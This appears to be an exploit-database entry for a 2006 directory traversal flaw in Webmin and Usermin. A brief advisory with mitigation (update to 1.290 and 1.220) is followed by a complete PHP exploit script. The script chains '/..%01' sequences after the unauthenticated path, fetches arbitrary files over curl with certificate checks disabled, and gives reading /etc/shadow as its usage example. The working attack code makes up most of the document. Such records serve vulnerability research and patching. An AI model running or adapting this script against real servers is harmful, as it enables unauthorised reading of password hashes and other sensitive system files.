Webmin / Usermin Arbitrary File Disclosure Vulnerability

vendor:

Webmin/Usermin

by:

joffer

7,5

CVSS

HIGH

Arbitrary File Disclosure

CWE

Product Name: Webmin/Usermin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Webmin / Usermin Arbitrary File Disclosure Vulnerability

This vulnerability allows remote attackers to disclose sensitive information on systems running Webmin or Usermin. The vulnerability is due to a directory traversal flaw in the unauthenticated portion of the Webmin/Usermin server. By sending a specially crafted request, a remote attacker can view arbitrary files on the system with the privileges of the Webmin/Usermin server. This vulnerability affects Webmin versions prior to 1.290 and Usermin versions prior to 1.220.

Mitigation:

Update to version 1.290 for Webmin and 1.220 for Usermin.

Source

Exploit-DB raw data:

<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date :  2006-06-30
Patch : update to version 1.290
Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/

$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {


$z = "/..%01";
for ($i=0;$i<60;$i++) {
        $z.="/..%01";
}

$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";

echo "Attacking ".$host."\n";
echo "---------------------------------\n";

// INITIALIZING CURL SESSION TO THE TARGET

$ch = curl_init();

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$content = curl_exec($ch);
curl_close ($ch);

// CLOSING CURL

// ECHOING THE CONTENT OF THE $FILE
echo $content;

echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";

} else {
        // IF INPUT IS NOT CORRECT DISPLAY THE README
        echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
        echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
        echo "Coded by joffer , http://securitydot.net\n";
}

?>

# milw0rm.com [2006-07-09]